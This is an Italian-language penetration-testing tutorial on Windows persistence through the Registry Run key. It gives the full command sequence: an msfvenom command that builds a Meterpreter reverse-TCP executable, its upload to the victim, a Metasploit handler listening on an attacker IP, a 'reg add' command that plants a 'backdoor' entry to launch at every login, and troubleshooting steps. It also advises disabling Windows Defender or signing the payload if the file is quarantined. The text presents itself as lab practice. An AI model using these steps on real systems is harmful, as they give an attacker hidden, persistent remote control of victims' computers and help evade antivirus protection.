tags: Persistenza Persistenza_Windows Powershell_Backdoor
Persistenza via Registry Run
Crea il payload con msfvenom (Sulla tua macchina Attaccante)
Apri un terminale sulla tua macchina (Kali/Parrot) e genera l’eseguibile.
Attenzione: L’IP (LHOST) deve essere l’IP della tua macchina attaccante che la vittima deve poter raggiungere.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.1.13 LPORT=4444 -f exe -o registry.exePer creare una backdoor che si attiva ogni volta che il computer viene riavviato possiamo seguire i seguenti passaggi a partire da una sessione meterpreter con privilegi di amministratore:
Carica il file sulla macchina Vittima
Devi trasferire registry.exe dalla tua macchina alla vittima. Usa il comando upload direttamente dentro Meterpreter:
upload /percorso/dove/hai/salvato/registry.exe C:\\Users\\Admin\\Downloads\\Controllo (dentro la shell della vittima): Verifica che il file ci sia e che non sia stato cancellato da Windows Defender:
dir C:\Users\Admin\Downloads\registry.exeSe il file non c’è o è stato messo in quarantena, dovrai disabilitare temporaneamente il Defender (per esercitazione) o firmare il payload.
Avviare il listener in Metasploit
Prima di fare qualsiasi cosa sulla vittima, metti in ascolto il Metasploit. Se avvii il listener dopo, il payload potrebbe tentare di connettersi e fallire.
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 10.10.1.13 #(stesso IP che hai messo in msfvenom!)
set LPORT 4444 #(stessa porta che hai messo in msfvenom!)
exploit -j #(il -j lo manda in background, così non blocchi il terminale)Se vuoi vederlo in primo piano, usa solo exploit, ma tieni presente che rimarrà in attesa.
Innestare il file malevolo nel riavvio Windows
shell # Per uscire da meterpreter, che usa altri comandi.
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v backdoor /t REG_EXPAND_SZ /d "C:\Users\Admin\Downloads\registry.exe"
Se la vittima ha più utenti, puoi usare sia HKLM (che parte per tutti) che HKCU (che parte per il singolo utente).

TEST IMMEDIATO – Esegui il file manualmente
Per non aspettare il riavvio, esegui subito il file dalla shell della vittima per verificare che payload + rete + listener funzionino perfettamente:
C:\Users\Admin\Downloads\registry.exeCosa succede ora?
-
Se tutto funziona, nella tua console Metasploit (dove hai messo il listener) vedrai comparire una nuova sessione
Meterpreter(es.[*] Sending stage...). -
Se non compare, fermati qui. Non è un problema di persistenza, ma di payload/rete. Verifica:
-
La vittima può pingare il tuo IP? (
ping 10.10.1.13) -
Hai impostato l’IP giusto in msfvenom e nel listener? (Devono essere identici).
-
Se invece tutto funziona correttamente dal nostro listener dovrebbe apparire la reverse shell come nella seguente immagine:

Adesso ogni volta che l’utente si loggerà triggererà la nostra reverse shell.